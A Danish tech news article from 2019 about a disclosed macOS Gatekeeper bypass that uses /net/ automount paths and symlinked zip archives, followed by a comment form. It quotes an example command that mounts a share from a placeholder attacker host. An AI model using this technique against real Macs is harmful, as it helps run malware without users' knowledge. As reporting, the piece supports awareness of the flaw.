Det er nemt at installere en ondsindet app på en Mac. Apple har ikke rettet fejlen selv efter tre måneder

27. 5. 2019

Sikkerhedsforsker Filippo Cavallarin postede en advarsel om fejlen i macOS 10.14.5 på sin blog. Dette består i muligheden for helt at omgå Gatekeepers sikkerhedsforanstaltninger. Ifølge Cavallarin påpegede han fejlen over for Apple allerede i februar i år, men virksomheden rettede den ikke i den seneste opdatering.

Gatekeeper blev udviklet af Apple og indarbejdet i deres desktop-operativsystem for første gang i 2012. Det er en mekanisme, der forhindrer en applikation i at køre uden brugerens viden og samtykke. Når du har downloadet en app, tjekker Gatekeeper automatisk dens kode for at se, om softwaren er korrekt signeret af Apple.

I sit blogindlæg udtaler Cavallarin, at Gatekeeper som standard betragter både eksternt lager og netværksdele for at være sikre lokationer. Enhver applikation, der ligger i disse mål, kan derfor automatisk startes uden at skulle gennemgå gatekeeper-kontrollen. Det er denne funktion, der kan udnyttes til at starte ondsindet software uden brugerens viden.

Et aspekt, der tillader uautoriseret adgang, er automount-funktionen, som giver brugerne mulighed for automatisk at montere en netværksshare blot ved at angive en sti, der begynder med "/net/". Som et eksempel nævner Cavallarin stien "ls /net/evil-attacker.com/sharedfolder/", som kan få operativsystemet til at indlæse indholdet af en "sharefolder"-mappe på en fjernplacering, der kan være potentielt skadelig.

Du kan se, hvordan truslen virker i videoen:

En anden faktor er det faktum, at hvis et zip-arkiv, der indeholder et specifikt symlink, der fører til automount-funktionen, deles, vil det ikke blive kontrolleret af Gatekeeper. På denne måde kan offeret nemt downloade det ondsindede arkiv og udpakke det, så angriberen kan køre stort set enhver software på Mac'en uden brugerens vidende. Finder, som skjuler visse udvidelser som standard, har også sin del af denne sårbarhed.

Cavallarin udtaler på sin blog, at Apple gjorde opmærksom på sårbarheden af macOS-operativsystemet den 22. februar i år. Men i midten af maj stoppede Apple med at kommunikere med Cavallarin, så Cavallarin besluttede at offentliggøre det hele.

kilde: FCVL

Emner: opbevaring, automatisk, MacOS, video, Indstillinger, fungere, bruger, aplikace, Apple

Diskussion af artiklen

Dit navn

Din kommentar

Ved at udfylde ovenstående data anerkender jeg, at virksomheden TEXT FACTORY s.r.o., med hjemsted i Brno, Durďákova 336/29, Černá Pole, postnummer: 613 00, ID-nummer: 06157831, registreret ved den regionale domstol i Brno , indsæt 100399, vil behandle mine personoplysninger, der er angivet i den af mig udfyldte registreringsformular på grundlag af TEXT FACTORY s.r.o.s legitime interesser i henhold til artikel 6, stk. f) GDPR og for at opfylde juridiske forpligtelser (artikel 1, stk. 6, litra c) GDPR), til følgende formål: nødvendigheden af at sikre autorisation af besøgende på websteder, der drives af TEXT FACTORY s.r.o. til at bidrage aktivt til offentliggjorte artikler eller i diskussion fora og udøve rettighederne til TEXT FACTORY s.r.o. som administrator af disse diskussionsfora. Mere information om behandling af personoplysninger og rettigheder kan findes i Lektioner om beskyttelse af personoplysninger. hele teksten

Det kunne være interesserer dig

Relaterede